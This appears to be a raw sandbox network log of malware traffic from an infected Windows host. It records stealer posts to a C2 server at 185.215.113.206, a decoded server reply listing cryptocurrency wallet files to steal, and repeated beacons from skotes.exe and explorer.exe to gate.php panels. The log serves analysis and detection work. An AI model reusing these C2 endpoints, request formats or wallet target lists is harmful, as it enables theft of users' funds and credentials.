Dec 12, 2024 16:50:01.982980013 CET	469	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JDBGDHIIDAEBFHJJDBFI Host: 185.215.113.206 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 44 42 47 44 48 49 49 44 41 45 42 46 48 4a 4a 44 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 63 64 61 66 31 34 30 64 35 36 61 62 39 34 34 63 36 38 31 36 64 61 36 62 64 33 37 66 33 38 36 64 30 62 39 62 38 32 66 37 36 31 36 30 34 34 64 39 36 63 61 31 35 33 36 35 34 30 36 65 34 63 36 35 31 61 61 33 64 34 37 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 42 47 44 48 49 49 44 41 45 42 46 48 4a 4a 44 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 42 47 44 48 49 49 44 41 45 42 46 48 4a 4a 44 42 46 49 2d 2d 0d 0a Data Ascii: ------JDBGDHIIDAEBFHJJDBFIContent-Disposition: form-data; name="token"dcdaf140d56ab944c6816da6bd37f386d0b9b82f7616044d96ca15365406e4c651aa3d47------JDBGDHIIDAEBFHJJDBFIContent-Disposition: form-data; name="message"wallets------JDBGDHIIDAEBFHJJDBFI--
Dec 12, 2024 16:50:02.427400112 CET	1236	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 15:50:02 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 2408 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED] Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
Dec 12, 2024 16:50:02.427407026 CET	1236	IN	Data Raw: 58 45 31 31 62 48 52 70 52 47 39 6e 5a 56 78 38 62 58 56 73 64 47 6c 6b 62 32 64 6c 4c 6e 64 68 62 47 78 6c 64 48 77 77 66 45 70 68 65 48 67 67 52 47 56 7a 61 33 52 76 63 43 41 6f 62 32 78 6b 4b 58 77 78 66 46 78 71 59 58 68 34 58 45 78 76 59 32 Data Ascii: XE11bHRpRG9nZVx8bXVsdGlkb2dlLndhbGxldHwwfEpheHggRGVza3RvcCAob2xkKXwxfFxqYXh4XExvY2FsIFN0b3JhZ2VcfGZpbGVfXzAubG9jYWxzdG9yYWdlfDB8SmF4eCBEZXNrdG9wfDF8XGNvbS5saWJlcnR5LmpheHhcSW5kZXhlZERCXGZpbGVfXzAuaW5kZXhlZGRiLmxldmVsZGJcfCouKnwwfEF0b21pY3wxfFx
Dec 12, 2024 16:50:02.427412033 CET	164	IN	Data Raw: 5a 45 52 43 58 47 68 30 64 48 42 7a 58 32 64 31 59 58 4a 6b 59 53 35 6a 62 31 38 77 4c 6d 6c 75 5a 47 56 34 5a 57 52 6b 59 69 35 73 5a 58 5a 6c 62 47 52 69 58 48 77 71 4c 69 70 38 4d 48 78 48 64 57 46 79 5a 47 45 67 52 47 56 7a 61 33 52 76 63 46 Data Ascii: ZERCXGh0dHBzX2d1YXJkYS5jb18wLmluZGV4ZWRkYi5sZXZlbGRiXHwqLip8MHxHdWFyZGEgRGVza3RvcFxMb2NhbCBTdG9yYWdlXGxldmVsZGJ8MXxcR3VhcmRhXExvY2FsIFN0b3JhZ2VcbGV2ZWxkYlx8Ki4qfDB8
Dec 12, 2024 16:50:02.554147959 CET	467	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DHIJEHJDHJKECBFHDHDH Host: 185.215.113.206 Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 48 49 4a 45 48 4a 44 48 4a 4b 45 43 42 46 48 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 63 64 61 66 31 34 30 64 35 36 61 62 39 34 34 63 36 38 31 36 64 61 36 62 64 33 37 66 33 38 36 64 30 62 39 62 38 32 66 37 36 31 36 30 34 34 64 39 36 63 61 31 35 33 36 35 34 30 36 65 34 63 36 35 31 61 61 33 64 34 37 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 4a 45 48 4a 44 48 4a 4b 45 43 42 46 48 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 4a 45 48 4a 44 48 4a 4b 45 43 42 46 48 44 48 44 48 2d 2d 0d 0a Data Ascii: ------DHIJEHJDHJKECBFHDHDHContent-Disposition: form-data; name="token"dcdaf140d56ab944c6816da6bd37f386d0b9b82f7616044d96ca15365406e4c651aa3d47------DHIJEHJDHJKECBFHDHDHContent-Disposition: form-data; name="message"files------DHIJEHJDHJKECBFHDHDH--
Dec 12, 2024 16:50:02.992713928 CET	202	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 15:50:02 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
89	192.168.2.10	50141	185.81.68.147	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:50:00.159343958 CET	283	OUT	POST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 12, 2024 16:50:00.279336929 CET	6	OUT	Data Raw: 45 5b 58 05 Data Ascii: E[X
Dec 12, 2024 16:50:01.961062908 CET	216	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 23:50:00 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
90	192.168.2.10	50144	185.215.113.43	80	7820	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:50:01.008996964 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 12, 2024 16:50:02.349546909 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 12 Dec 2024 15:50:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
91	192.168.2.10	50146	185.81.68.147	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:50:02.187304974 CET	283	OUT	POST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 12, 2024 16:50:02.307286024 CET	6	OUT	Data Raw: 45 5b 58 05 Data Ascii: E[X
Dec 12, 2024 16:50:03.666012049 CET	216	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 23:50:02 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port
92	192.168.2.10	50147	185.81.68.147	80

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:50:02.864022970 CET	264	OUT	POST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Dec 12, 2024 16:50:04.214760065 CET	257	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 23:50:03 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 40 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 35 32 36 62 39 30 39 36 37 61 31 62 37 35 39 39 36 34 30 35 34 64 32 30 62 37 36 65 36 66 34 66 35 37 34 31 63 31 64 62 Data Ascii: 526b90967a1b759964054d20b76e6f4f5741c1db

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
93	192.168.2.10	50148	185.81.68.147	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:50:03.892924070 CET	283	OUT	POST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 12, 2024 16:50:04.012826920 CET	6	OUT	Data Raw: 45 5b 58 05 Data Ascii: E[X
Dec 12, 2024 16:50:05.653717995 CET	216	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 23:50:04 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port
94	192.168.2.10	50150	185.81.68.147	80

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:50:04.340871096 CET	284	OUT	POST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 10
Dec 12, 2024 16:50:04.464068890 CET	10	OUT	Data Raw: 72 57 42 2b 57 5a 5c 55 43 12 Data Ascii: rWB+WZ\UC
Dec 12, 2024 16:50:05.962764978 CET	1236	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 23:50:04 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 38 64 61 34 0d 0a 4e 3f 3c 6f 33 10 19 16 17 43 44 10 5b 6a 5b 55 57 57 5b 59 5d 17 46 12 58 17 6d 45 14 4c 5b 05 46 47 1e 1f 49 13 48 42 17 18 45 1b 54 53 13 18 54 0e 5c 48 15 19 19 1b 1c 57 5c 5c 51 0a 46 43 48 19 51 0a 59 01 58 03 1b 54 5b 5c 49 13 48 42 17 18 42 07 55 55 54 53 43 13 48 4c 5a 5a 43 50 5a 58 51 1b 5b 16 55 1a 40 1b 16 47 1c 15 55 00 50 55 46 5e 14 42 0d 0c 52 1c 51 0d 56 57 55 53 19 02 5e 0f 1d 17 15 19 14 1e 43 50 46 12 5b 53 07 44 18 08 59 1c 5d 0a 59 56 1a 52 0c 5c 4e 40 19 12 14 0b 57 53 56 5b 5e 0f 56 4c 43 50 55 5c 5b 51 44 47 4d 4a 5f 5f 18 5e 5a 09 57 48 5b 14 52 15 18 11 41 1b 03 0d 5a 55 5a 07 4f 59 5d 53 58 4f 52 0d 5a 1f 1b 15 16 16 44 47 55 0a 41 5c 03 43 53 4b 51 09 5b 01 59 52 55 41 0a 42 4a 01 5a 5f 14 4e 19 12 13 5a 52 0f 52 10 19 5a 4b 5e 1c 16 1c 15 16 4e 5e 5f 05 1a 43 15 5a 09 55 02 18 58 47 1f 0b 5e 1d 0d 43 57 44 11 5c 1e 5a 59 5a 4b 13 4e 17 17 5b 08 18 5a 55 59 1a 03 5d 5f 05 1d 14 49 16 44 1e 10 1b 54 58 50 11 58 10 1b 1b 5f 45 48 1b 1c 19 14 1d 05 5f 11 [TRUNCATED] Data Ascii: 8da4N?<o3CD[j[UWW[Y]FXmEL[FGIHBETST\HW\\QFCHQYXT[\IHBBUUTSCHLZZCPZXQ[U@GUPUF^BRQVWUS^CPF[SDY]YVR\N@WSV[^VLCPU\[QDGMJ__^ZWH[RAZUZOY]SXORZDGUA\CSKQ[YRUABJZ_NZRRZK^N^_CZUXG^CWD\ZYZKN[ZUY]_IDTXPX_EH_VVTNJX[OJDN[DDQYkl;B:?4<F[^RUEDF8=C?o?B;=A<hN9nBEFFBF]AD@V]X\HPYYL\UTWHCQWZBQ^TEDk?CDB@IQM^[@4<DBGAV9VXZE_@?<BABn43DBE9lCDBBPVj[\P[BP^AWAEQPEPj@__K[U6RY\TW@YDAn\h<FFCDBBPX]RXQWQVE9UQhZDmFBGD\HMkCRYSP^U@EVUC__U\XZDY[SMlO^DEXWW\TGl@[WSk\RXU?Z,@_K_rRArEA\G@TZZVTZX[GAECEPj@MUABkCVAM\DZi?[j9FBYBQ?8@\W\eTCh[LTjXU^UPB:WkXnSlVEQZZLElhFQCYYFVCmA^i]eTCh[LTjVXAC_kYYKVXZE^B[G[KYZjACCXUCQGQQDASXjDRGZXeP_WP
Dec 12, 2024 16:50:05.962776899 CET	224	IN	Data Raw: 41 4c 53 6b 43 0f 5e 5b 54 5b 5c 5a 14 56 5a 46 59 6e 12 07 4f 46 3a 52 07 40 03 69 15 14 43 15 1c 10 07 4d 46 0b 3e 1b 53 56 58 51 08 56 4c 56 45 49 17 5f 50 55 5b 40 0d 54 59 01 56 42 0c 59 08 1a 08 40 5a 57 5d 0a 54 0a 16 69 10 08 51 17 10 05 Data Ascii: ALSkC^[T[\ZVZFYnOF:R@iCMF>SVXQVLVEI_PU[@TYVBY@ZW]TiQEG_BTYXJElXPUhPSP:pPTDWNPBXB^_^FIXXXPUXACMA8@AWNeFVEE[eo9l@@ZQ[ihC_Pj@\HIiSEkTWL\PZFX_kT
Dec 12, 2024 16:50:05.962794065 CET	1236	IN	Data Raw: 3a 16 46 46 5e 4e 54 5e 6d 46 53 05 6e 14 42 58 45 4d 59 51 0e 52 17 44 08 65 1b 6a 16 10 54 41 10 5d 53 0d 45 44 00 55 12 09 3a 17 58 52 57 3f 13 44 0b 51 0f 6a 40 5c 48 49 69 53 00 45 07 6b 17 19 5a 5a 55 43 46 09 38 10 56 0d 45 5b 48 55 09 5a Data Ascii: :FF^NT^mFSnBXEMYQRDejTA]SEDU:XRW?DQj@\HIiSEkZZUCF8VE[HUZGXXDG[U>K@PBPKSUSA]W>PDQcQ]\\CCe[S[_VDlWDl@DQAh^\UI@_S_^SPZW@YZZJ\ETZS@:CT\UQJE=VW\UiRYPXn\t`3IG
Dec 12, 2024 16:50:05.962812901 CET	224	IN	Data Raw: 5e 53 09 52 3a 16 58 71 56 40 54 43 55 43 07 4d 42 5f 10 58 44 50 59 59 5d 1e 11 47 54 57 07 0a 1b 5c 54 56 01 5e 0e 5e 5e 58 15 43 12 14 12 4c 47 51 0c 3f 13 10 07 4d 46 6a 40 19 40 58 42 43 04 43 0c 0a 69 1b 62 06 19 09 68 1e 38 10 10 14 56 5a Data Ascii: ^SR:XqV@TCUCMB_XDPYY]GTW\TV^^^XCLGQ?MFj@@XBCCibh8VZS[hDi_\_iSIo]WCm@XXAZQ^R@l@9FGORmAT>WM__YTB_keUEA[]BRU:SQhCX_iSIo]WCm@VUXEGi]BUXFYZDTVnBKF@V
Dec 12, 2024 16:50:05.962817907 CET	1236	IN	Data Raw: 0d 44 07 1a 47 5c 58 55 40 59 43 51 59 6e 12 04 58 44 08 18 0f 50 32 50 5b 51 5c 02 45 0d 13 40 57 6a 40 07 0c 55 57 55 04 5d 42 51 5a 4b 04 6a 16 53 43 42 38 10 10 10 41 1b 11 53 1e 40 5b 69 15 57 5e 0d 57 0d 05 1b 53 46 12 17 59 5d 53 59 15 58 Data Ascii: DG\XU@YCQYnXDP2P[Q\E@Wj@UWU]BQZKjSCB8AS@[iW^WSFY]SYX^VXM_[^Z_S^SB:XAQZJCjPRYf__Q\QhFs4aJEU]S_IEMCAiMSLDiDBQCSX[hDn>8@DWLUj=BYTT\hVBnBZWZZA_mAT>ECUjP>
Dec 12, 2024 16:50:05.962824106 CET	1236	IN	Data Raw: 55 55 08 17 5d 1e 06 5e 43 07 05 54 46 0e 09 50 0d 44 10 01 5b 57 16 45 5b 68 44 54 42 40 59 4e 52 17 4f 56 5d 58 16 5c 5e 4d 16 17 12 46 0f 68 5c 57 49 43 40 1d 56 5b 0a 46 51 0b 59 53 17 6a 44 0a 46 09 5e 5a 41 16 45 44 0b 51 0f 6a 40 4c 43 5c Data Ascii: UU]^CTFPD[WE[hDTB@YNROV]X\^MFh\WIC@V[FQYSjDF^ZAEDQj@LC\DhU>WX[QiJ@=SWS:FANDT^mFPJB>ZZVB_kJN[kY[DFESiFFD_XO\\FMlVETTIPBU\\Nl@YYS:FTB@^^PQB_eVPQ=BVGPXXQWQl@tYSFW\RZE?DYSUQ_UR
Dec 12, 2024 16:50:05.962830067 CET	448	IN	Data Raw: 10 46 03 4d 58 1b 0c 17 43 1b 40 1b 38 33 19 16 14 10 15 14 44 12 10 42 15 41 00 54 39 57 09 5b 43 51 5f 17 13 5e 6f 3f 12 16 42 19 10 19 16 17 41 11 39 3a 3f 19 19 16 14 10 15 14 44 12 10 42 17 16 1e 3b 6c 14 46 15 17 14 11 43 11 44 42 15 12 16 Data Ascii: FMXC@83DBAT9W[CQ_^o?BA9:?DB;lFCDBBRVP=UP_VDQF[T_kWGZSQ<TZ@{JCXQR=BVGPX\YQP\>BChD<iDBBABPW\QSA^^R@X\A_AXTUjPSjWL[VUGhFSVE:YDCGPU
Dec 12, 2024 16:50:05.962836027 CET	1236	IN	Data Raw: 0d 50 11 44 08 65 1b 42 58 1d 45 46 0d 44 51 16 52 16 06 45 4b 44 07 46 44 57 5e 07 54 55 42 46 42 57 4f 50 5e 49 43 43 4c 45 07 4f 41 65 1b 16 40 49 45 51 59 6e 12 16 52 4e 11 6a 44 14 16 59 56 57 54 0b 5e 08 06 50 40 0b 3e 1b 75 41 46 5e 13 50 Data Ascii: PDeBXEFDQREKDFDW^TUBFBWOP^ICCLEOAe@IEQYnRNjDYVWT^P@>uAF^P^ZWRUDPhF]OZX@kQmFBT@_B\GBCSeBFEPhFQ^WHZVYh&IDTFS>XCCRZEU\BQiTV>Y]VC]CW@LBPReubfiDQ\DEXjD@GFXPQEOIQJETU
Dec 12, 2024 16:50:05.962841988 CET	224	IN	Data Raw: 40 55 57 54 04 19 10 52 52 5c 41 1a 14 5e 50 43 25 56 54 10 52 45 16 53 15 1a 03 41 5f 1d 0a 43 4c 4d 59 15 5e 42 01 6b 55 5e 53 4f 04 42 4c 51 5a 4b 7c 57 57 58 1d 46 01 55 55 1a 17 0b 5b 16 1d 14 08 5a 53 51 1f 17 54 1c 16 76 5d 58 16 5c 5e 4d Data Ascii: @UWTRR\A^PC%VTRESA_CLMY^BkU^SOBLQZK\|WWXFUU[ZSQTv]X\^MA_SPMSLDv[FUCSXVRCVXNq]REBRFUBWBCDdSMRG^'TQ^JKU^SOA\NWYPU@JD!XXS@FZ^TJPJB!V^MSYREUXUQGQWHNXA
Dec 12, 2024 16:50:05.962878942 CET	1236	IN	Data Raw: 27 50 02 47 52 47 42 06 42 4a 16 47 4a 1f 59 19 4d 10 0d 17 1c 11 1f 1e 0e 19 50 50 14 18 50 58 4a 51 5c 03 44 45 29 5f 15 40 4f 15 4c 14 54 0f 1f 07 0e 54 41 45 2e 50 43 4d 18 51 0e 43 27 56 56 51 11 55 58 51 46 47 2a 53 5d 07 17 0b 5b 16 1d 14 Data Ascii: 'PGRGBBJGJYMPPPXJQ\DE)_@OLTTAE.PCMQC'VVQUXQFG*S][SRP{S[DVzXTtTJ\\Z^EREMFZSQJDWZLZ\XED-XCK\[[FP^QDx[]JLJDOYMUXB[\NwPTGQAUEMFVVRa CtRo[o$\|&_LILZSx@W$gcVf<J

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
95	192.168.2.10	50151	185.215.113.43	80	7820	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:50:05.441742897 CET	306	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 152 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 45 37 37 42 30 35 42 38 32 44 31 32 46 43 30 37 44 42 32 33 39 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B12E77B05B82D12FC07DB239B96DA0445166EF7A7D35B1E750864299
Dec 12, 2024 16:50:06.653698921 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 12 Dec 2024 15:50:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
96	192.168.2.10	50156	185.81.68.147	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:50:05.892986059 CET	283	OUT	POST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 12, 2024 16:50:06.015974045 CET	6	OUT	Data Raw: 45 5b 58 05 Data Ascii: E[X
Dec 12, 2024 16:50:07.654304981 CET	216	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 23:50:06 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port
97	192.168.2.10	50164	185.81.68.147	80

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:50:07.622625113 CET	264	OUT	POST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Dec 12, 2024 16:50:08.956460953 CET	257	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 23:50:08 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 40 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 35 32 36 62 39 30 39 36 37 61 31 62 37 35 39 39 36 34 30 35 34 64 32 30 62 37 36 65 36 66 34 66 35 37 34 31 63 31 64 62 Data Ascii: 526b90967a1b759964054d20b76e6f4f5741c1db

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
98	192.168.2.10	50165	185.81.68.147	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:50:07.940753937 CET	283	OUT	POST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 12, 2024 16:50:08.068063021 CET	6	OUT	Data Raw: 45 5b 58 05 Data Ascii: E[X
Dec 12, 2024 16:50:09.550163031 CET	216	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 23:50:08 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
99	192.168.2.10	50172	185.215.113.43	80	7820	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
